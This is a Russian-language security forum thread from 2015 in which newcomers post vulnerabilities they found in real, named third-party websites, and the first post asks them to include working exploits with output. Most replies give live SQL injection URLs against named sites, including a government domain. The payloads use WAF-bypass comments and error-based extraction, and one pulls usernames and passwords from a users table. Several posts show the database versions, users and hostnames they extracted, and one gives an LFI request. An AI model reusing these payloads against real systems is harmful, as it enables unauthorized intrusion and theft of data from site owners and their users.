HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.05.2015, 10:12
Егорыч+++
Познавший АНТИЧАТ
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию

Эта тема только для публикации уязвимостей найденным вами лично. Любая честно найденная уязвимость прибавляет вам репутации. Тема исключительно для вновь прибывших.

Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:

Google:

Код:
Code:
site:antichat.ru ваш_сайт_с_уязвимостью.ру
Не забывайте, что необходимо написать эксплоит с выводом для SQLi, для XSS вывести alert(), для LFI прочитать /etc/passwd и т. п.

Цитата:
Сообщение от BigBear  
BigBear said:

Ребят, в целях обучения начинающих пентестеров грамотным определениям - ЖЕЛАТЕЛЬНО (если хотите плюсы) указывать полный тип найденной уязвимости - Blind SQL Injection, Reflected XSS, Arbitrary File Downloading и другие.
 
Ответить с цитированием

  #2  
Старый 10.05.2015, 11:30
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Два http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-

Кстати , тут WAF и я заюзал технику буфер оверфлов П.С нигде я не нашёл на эту тему статей и очень мало мануалов про обход WAF итд .
 
Ответить с цитированием

  #3  
Старый 10.05.2015, 11:37
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Три lfi

http://greyslon.ru/index.php

post

action=register

&ajax=true

&data=login%3De%26email%3De%26pass%3De%26repass%3D e%26payeer%3De%26captcha%3De

&page=../info

Ещё это http://greyslon.ru/htaccess Не знаю уязвимость это или нет чтение этого файла
 
Ответить с цитированием

  #4  
Старый 10.05.2015, 12:49
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

bidderland.co.in/siteadmin

Эта уязвимость эксплуатируется за 5 секунд.

нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.
 
Ответить с цитированием

  #5  
Старый 10.05.2015, 20:16
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию

Цитата:
Сообщение от tiger_x  
tiger_x said:

Первая SQL
http://www.c2-int.com/news-full.php?id=1278'
А что не раскрутил ?

Код:
Code:
http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14+--+
Версия: 5.5.43-37.2

User: c2deuts_ice@localhost

-----------------------------

Цитата:
Сообщение от None  
Вторая XSS
Зачем делать несколько постов можно в одном все выложить
 
Ответить с цитированием

  #6  
Старый 10.05.2015, 20:39
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от tiger_x  
tiger_x said:

Просто прямо сейчас ищу )) Как нахожу выкладываю!
Раскручивайте уязвимости. Пытайтесь придумать вектор атаки. Мы вас не для этого отбираем, чтобы вы просто умели что-то искать.
 
Ответить с цитированием

  #7  
Старый 10.05.2015, 21:02
frank
Guest
Сообщений: n/a
Провел на форуме:
56887

Репутация: 28
По умолчанию

Код HTML:
HTML:
http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12+--+
5.5.40-0ubuntu0.12.04.1 - вывод в заголовке

Код HTML:
HTML:
http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16+--+
5.6.23

Код HTML:
HTML:
http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3,4,5,6+from+users+limit+10,1+--+
4.1.18-nt
 
Ответить с цитированием

  #8  
Старый 10.05.2015, 23:25
frank
Guest
Сообщений: n/a
Провел на форуме:
56887

Репутация: 28
По умолчанию

Код HTML:
HTML:
http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
idserver_damico@winwebs03.cpt.wa.co.za

idserver_damicodb

5.5.42-cll
 
Ответить с цитированием

  #9  
Старый 11.05.2015, 00:51
Mister_Bert0ni
Guest
Сообщений: n/a
Провел на форуме:
35015

Репутация: 57
По умолчанию

http://goo.gl/imjzsb

http://goo.gl/8IKVeV

http://goo.gl/wYRBLz

http://emofans.ru/gallery/emowallp/

POST_DATA:

foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0 x7e7e496e6a6563746564204279204d69737465725f4265727 4306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version() )e)f)x)) -- -


https://www.choosewellness.com.ph/ca...entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e20 7374796c653d22666f6e742d66616d696c793a4963656c616e 643b636f6c6f723a7265643b73697a653a353b746578742d73 6861646f773a23303030203070782030707820337078223e4d 69737465725f42657274306e693c62723e,0x4461746162617 365203a3a202020,DATABASE(),0x3c62723e506f727420203 a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3 a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSIO N_COMPILE_MACHINE,0x3c62723e56657273696f6e206f6620 4461746162617365203a3a2020,version(),0xa3c62723e48 6f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e ))x)x)
 
Ответить с цитированием

  #10  
Старый 11.05.2015, 00:55
Mister_Bert0ni
Guest
Сообщений: n/a
Провел на форуме:
35015

Репутация: 57
По умолчанию

Демонстрация SQLi от меня
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ